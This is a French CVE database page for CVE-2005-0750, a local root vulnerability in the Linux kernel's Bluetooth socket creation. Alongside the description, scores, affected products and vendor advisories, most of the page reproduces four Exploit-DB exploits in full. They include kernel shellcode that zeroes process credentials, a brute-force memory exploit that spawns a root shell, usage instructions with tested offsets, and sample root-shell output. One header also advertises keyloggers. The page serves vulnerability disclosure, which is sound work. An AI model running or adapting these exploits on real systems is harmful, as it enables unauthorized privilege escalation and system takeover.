CVE-2005-0750 : Détail

CVE-2005-0750

0.21%V4
Local
2005-04-03
03h00 +00:00
2017-10-09
22h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The bluez_sock_create function in the Bluetooth stack for Linux kernel 2.4.6 through 2.4.30-rc1 and 2.6 through 2.6.11.5 allows local users to gain privileges via (1) socket or (2) socketpair call with a negative protocol value.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 25287

Date de publication : 2005-03-27 22h00 +00:00
Auteur : ilja van sprundel
EDB Vérifié : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> main() { int ctl; /* Open HCI socket */ if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0) { perror("Can't open HCI socket."); exit(1); } }
Exploit Database EDB-ID : 25289

Date de publication : 2005-10-18 22h00 +00:00
Auteur : backdoored.net
EDB Vérifié : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT * * 19 October 2005 http://backdoored.net Visit us for Undetected keyloggers and packers.Thanx h4x0r bluetooth $ id uid=1000(addicted) gid=100(users) groups=100(users) h4x0r bluetooth $ h4x0r bluetooth $ ./backdoored-bluetooth KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) KERNEL Oops. Exit Code = 11.(Segmentation fault) Checking the Effective user id after overflow : UID = 0 h4x0r bluetooth # id uid=0(root) gid=0(root) groups=100(users) h4x0r bluetooth # h4x0r bluetooth # dmesg PREEMPT SMP Modules linked in: CPU: 0 EIP: 0060:[<c0405ead>] Not tainted VLI EFLAGS: 00010286 (2.6.9) EIP is at bt_sock_create+0x3d/0x130 eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c ds: 007b es: 007b ss: 0068 Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 Call Trace: [<c039a3bb>] __sock_create+0xfb/0x2a0 [<c039a58d>] sock_create+0x2d/0x40 [<c039a60b>] sys_socket+0x2b/0x60 [<c039b4e8>] sys_socketcall+0x68/0x260 [<c0117a9c>] finish_task_switch+0x3c/0x90 [<c0117b07>] schedule_tail+0x17/0x50 [<c0115410>] do_page_fault+0x0/0x5e9 [<c01031af>] syscall_call+0x7/0xb Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <sys/types.h> #include <unistd.h> #include <limits.h> #include <signal.h> #include <sys/wait.h> #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 #define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff #define KERNEL_SPACE_BUFFER 0x100000 char asmcode[] = /*Global shellcode*/ "xb8x00xf0xffxffx31xc9x21xe0x8bx10x89x8a" "x80x01x00x00x31xc9x89x8ax7cx01x00x00x8b" "x00x31xc9x31xd2x89x88x90x01x00x00x89x90" "x8cx01x00x00xb8xffxffxffxffxc3"; struct net_proto_family { int family; int (*create) (int *sock, int protocol); short authentication; short encryption; short encrypt_net; int *owner; }; int check_zombie_child(int status,pid_t pid) { waitpid(pid,&status,0); if(WIFEXITED(status)) { if(WEXITSTATUS(status) != 0xFF) exit(-1); } else if (WIFSIGNALED(status)) { printf("KERNEL Oops. Exit Code = %d.(%s) ",WTERMSIG(status),strsignal(WTERMSIG(status))); return(WTERMSIG(status)); } } int brute_socket_create (int negative_proto_number) { socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ int i; i = geteuid(); printf("Checking the Effective user id after overflow : UID = %d ",i); if(i) exit(EXIT_FAILURE); printf("0wnage D0ne bro. "); execl("/bin/sh","sh",NULL); exit(EXIT_SUCCESS); } int main(void) { pid_t pid; int counter; int status; int *kernel_return; char kernel_buffer[KERNEL_SPACE_BUFFER]; unsigned int brute_start; unsigned int where_kernel; struct net_proto_family *bluetooth; bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); bzero(bluetooth,sizeof(struct net_proto_family)); bluetooth->family = AF_BLUETOOTH; bluetooth->authentication = 0x0; /* No Authentication */ bluetooth->encryption = 0x0; /* No Encryption */ bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ bluetooth->owner = 0x0; /* No fucking owner */ bluetooth->create = (int *) asmcode; kernel_return = (int *) kernel_buffer; for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) *kernel_return = (int)bluetooth; brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; printf("Bluetooth stack local root exploit "); printf("http://backdoored/net"); while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) { where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; where_kernel = -where_kernel; pid = fork(); if(pid == 0 ) brute_socket_create(where_kernel); check_zombie_child(status,pid); brute_start += KERNEL_SPACE_BUFFER; fflush(stdout); } return 0; }
Exploit Database EDB-ID : 926

Date de publication : 2005-10-25 22h00 +00:00
Auteur : qobaiashi
EDB Vérifié : Yes

/* Due to many responses i've improved the exploit to cover more systems! ONG_BAK v0.9 [october 24th 05] """""""""""""""""""""""""""""""""""" o universal "shellcode" added o try to use all possible memory regions o bugfixes qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222 -|-bluez local root exploit v.0.9 -by qobaiashi- | |- i've found kernel 2.6.11.4-20a-default |- trampoline is at 0x804869c |- trying... |- [ecx: bf8d0000 ] |- suitable value found!using 0xbf8d0000 |- the time has come to push the button... sh-3.00# exit ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> that's it. unfortunately it's not yet very practicable.. qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #include <sys/mman.h> void usage(char *path); //===================[ kernel 2.6* privilege elevator ]=============================== //===================[ qobaiashi@u-n-f.com ]=============================== //globals int uid, gid; extern load_highlevel; __asm__ ( "load_highlevel: \n" "xor %eax, %eax \n" "mov $0xffffe000, %eax\n" "and %esp,%eax \n" "pushl %eax \n" "call set_root \n" "pop %eax \n" //ret to userspace-2.6.* version " cli \n" " pushl $0x7b \n" //DS user selector " pop %ds \n" " pushl %ds \n" //SS " pushl $0xc0000000 \n" //ESP " pushl $0x246 \n" //EFLAGS " pushl $0x73 \n" //CS user selector " pushl $shellcode \n" //EIP must not be a push /bin/sh shellcode!! "iret \n" ); void set_root(unsigned int *ts) { ts = (int*)*ts; int cntr; //hope you guys are int aligned for(cntr = 0; cntr <= 512; cntr++, ts++) if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid) ts[0] = ts[1] = ts[4] = ts[5] = 0; } void shellcode() { system("/bin/sh"); exit(0); } //==================================================================================== //==================================================================================== main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; int *linker = 0; unsigned int arg; int tmp; char *check; struct utsname vers; gid = getgid(); uid = getuid(); printf("-|-bluez local root exploit v.0.9 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't determine kernel version\n"); else printf(" |- i've found kernel %s\n", vers.release); printf(" |- trampoline is at %p\n", &load_highlevel); if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (fork() != 0)//parent watch the Oops { //previous Oops printing usleep(1000); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); check+=5; *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); //page align FIXME: might be booggy int *ecx = mod; mod = (int)mod &~ 0x00000fff; linker = mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0); if(linker == mod)//we could mmap the area { printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } else { printf(" |- could not mmap %p\n", mod); if( brk((void*)mod+0x200 ) == -1) { printf(" |- could not brk to %p\n", mod); printf(" `-------------------------------\n"); exit(-1); } //here we did it printf(" |- suitable value found!using %p\n", mod); printf(" |- the time has come to push the button... \n"); for (sock = 0;sock <= 1;sock++) //use ecx *(ecx++) = (int)&load_highlevel; //link to shellcode } if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) exit(1); } return 0; } if (fork() == 0)//child does the pre-exploit { printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -41122122 \n"); printf(" | Kernel 2.6.11: -10023 \n"); printf(" | SuSE 9.3: -100222\n"); printf(" | -102901\n"); printf(" `-----------------------\n"); exit(0); } // 1st post: milw0rm.com [2005-04-09] // milw0rm.com [2005-10-26]
Exploit Database EDB-ID : 25288

Date de publication : 2005-04-07 22h00 +00:00
Auteur : qobaiashi
EDB Vérifié : Yes

/* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer. */ /* ONG_BAK v0.3 [april 8th 05] """"""""""""""""""""""""""""""""" ong_bak now checks the value of ecx and launches the exploit in case a suitable value has been found! ONG_BAK v0.1 [april 4th 05] """"""""""""""""""""""""""""""""" local root exploit for the bluetooth bug usage: the bug is quite stable so you can't realy fuck things up if you stick to the following: play around with the negative argument until ecx points to our data segment: qobaiashi@voyager:~> id uid=1000(qobaiashi) gid=100(users) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> ./ong_bak -1002341 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0b8f0f0f ] qobaiashi@voyager:~> ./ong_bak -10023411 -|-local bluez exploit v.0.3 -by qobaiashi- | |- i've found kernel 2.6.4-52-default |- trying... |- [ecx: 0809da40 ] |- suitable value found!using 0x0809da40 |- the time has come to push the button.. qobaiashi@voyager:~> id uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users) qobaiashi@voyager:~> the parent process becomes root. that's it. unfortunately it's not yet very practicable.. qobaiashi@u-n-f.com */ #include <sys/klog.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/hci_lib.h> #include <sys/utsname.h> #define BRKVAL 0x0cec9000 //should be enough but fix it if you get an error void usage(char *path); //due to changing task_structs we need different offsets char k_give_root[] = //----[ give root in ring0/tested on linux2.6.5/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\xa4\x00\x00\x00" // mov 0xa4(%eax),%eax "\xc7\x80\xf0\x01\x00\x00\x00" // movl $0x0,0x1f0(%eax) "\x00\x00\x00" "\xc7\x80\xf4\x01\x00\x00\x00" // movl $0x0,0x1f4(%eax) "\x00\x00\x00" "\xc7\x80\x00\x02\x00\x00\x00" // movl $0x0,0x200(%eax) "\x00\x00\x00" "\xc7\x80\x04\x02\x00\x00\x00" // movl $0x0,0x204(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; char k_give_root2[] = //----[ give root in ring0/tested linux2.6.11/x86/ by -q ]-----\\ "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\x31\xc0" // xor %eax,%eax "\xb8\x00\xe0\xff\xff" // mov $0xffffe000,%eax "\x21\xe0" // and %esp,%eax "\x8b\x00" // mov (%eax),%eax "\x8b\x80\x9c\x00\x00\x00" // mov 0x9c(%eax),%eax "\xc7\x80\x68\x01\x00\x00\x00" // movl $0x0,0x168(%eax) "\x00\x00\x00" "\xc7\x80\x78\x01\x00\x00\x00" // movl $0x0,0x178(%eax) "\x00\x00\x00" "\xc7\x80\x6c\x01\x00\x00\x00" // movl $0x0,0x16c(%eax) "\x00\x00\x00" "\xc7\x80\x7c\x01\x00\x00\x00" // movl $0x0,0x17c(%eax) "\x00\x00\x00" "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 ; main(int argc, char *argv[]) { char buf[2048]; int sock, *mod = (int*)buf; unsigned int arg; int tmp; char *check, *ong_code = 0; struct utsname vers; printf("-|-local bluez exploit v.0.3 -by qobaiashi-\n |\n"); if (uname(&vers) < 0) printf(" |- couldn't determine kernel version\n"); else { printf(" |- i've found kernel %s\n", vers.release); if(strstr(vers.release, "2.6.11") > 0) ong_code = k_give_root2; if(strstr(vers.release, "2.6.4") > 0) ong_code = k_give_root; } if (ong_code == 0) { printf(" |- no supported version found..trying 2.6.4 code\n"); ong_code = k_give_root; } if( brk((void*)BRKVAL) == -1 ) { printf(" |- brk failed..exiting\n"); exit(1); } if (argc < 2) { usage(argv[0]); exit(1); } if (argc == 2) arg = strtoul(argv[1], 0, 0); if (argc == 3) { arg = strtoul(argv[1], 0, 0); mod = (unsigned int*)strtoul(argv[2], 0, 0); } if (fork() != 0)//parent watch the Oops { //previous Oops printing usleep(100); if ((tmp = klogctl(0x3, buf, 1700)) > -1) { check = strstr(buf, "ecx: "); printf(" |- [%0.14s]\n", check); if (*(check+5) == 0x30 && *(check+6) == 0x38) { check+=5; printf(" |- suitable value found!using 0x%0.9s\n", check); printf(" |- the time has come to push the button... check your id!\n"); *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0'; mod = (unsigned int*)strtoul(check, 0, 0); for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } } return 0; } if (fork() == 0)//child does the exploit { for (sock = 0;sock <= 200;sock++) *(mod++) = (int)ong_code;//link to shellcode printf(" |- trying...\n"); if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0) { printf(" |- something went w0rng (invalid value)\n"); exit(1); } } exit(0); } /*****************\ |** usage **| \*****************/ void usage(char *path) { printf(" |----------------------------\n"); printf(" | usage: %s <negative value> \n", path); printf(" | tested:\n"); printf(" | SuSE 9.1: -10023411 \n"); printf(" | -10029 \n"); printf(" | Kernel 2.6.11: -10023 \n"); exit(0); }

Products Mentioned

Configuraton 0

Conectiva>>Linux >> Version 10.0

Configuraton 0

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.19

Linux>>Linux_kernel >> Version 2.4.20

Linux>>Linux_kernel >> Version 2.4.21

Linux>>Linux_kernel >> Version 2.4.22

Linux>>Linux_kernel >> Version 2.4.23

Linux>>Linux_kernel >> Version 2.4.24

Linux>>Linux_kernel >> Version 2.4.25

Linux>>Linux_kernel >> Version 2.4.26

Linux>>Linux_kernel >> Version 2.4.27

Linux>>Linux_kernel >> Version 2.4.28

Linux>>Linux_kernel >> Version 2.4.29

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.3

Linux>>Linux_kernel >> Version 2.6.4

Linux>>Linux_kernel >> Version 2.6.5

Linux>>Linux_kernel >> Version 2.6.6

Linux>>Linux_kernel >> Version 2.6.7

Linux>>Linux_kernel >> Version 2.6.8

Linux>>Linux_kernel >> Version 2.6.9

    Linux>>Linux_kernel >> Version 2.6.10

    Linux>>Linux_kernel >> Version 2.6.11

    Redhat>>Enterprise_linux >> Version 4.0

      Redhat>>Enterprise_linux >> Version 4.0

        Redhat>>Enterprise_linux >> Version 4.0

          Redhat>>Enterprise_linux_desktop >> Version 4.0

          Redhat>>Fedora_core >> Version core_1.0

            Redhat>>Fedora_core >> Version core_2.0

              Redhat>>Fedora_core >> Version core_3.0

                Redhat>>Linux >> Version 7.3

                Redhat>>Linux >> Version 7.3

                  Redhat>>Linux >> Version 7.3

                    Redhat>>Linux >> Version 9.0

                      Suse>>Suse_linux >> Version 1.0

                        Suse>>Suse_linux >> Version 9.3

                        Ubuntu>>Ubuntu_linux >> Version 4.1

                          Ubuntu>>Ubuntu_linux >> Version 4.1

                            Références

                            http://www.redhat.com/support/errata/RHSA-2005-366.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://www.redhat.com/support/errata/RHSA-2005-283.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://marc.info/?l=bugtraq&m=111204562102633&w=2
                            Tags : mailing-list, x_refsource_BUGTRAQ
                            http://www.securityfocus.com/bid/12911
                            Tags : vdb-entry, x_refsource_BID
                            https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
                            Tags : vendor-advisory, x_refsource_FEDORA
                            http://www.redhat.com/support/errata/RHSA-2005-293.html
                            Tags : vendor-advisory, x_refsource_REDHAT
                            http://www.redhat.com/support/errata/RHSA-2005-284.html
                            Tags : vendor-advisory, x_refsource_REDHAT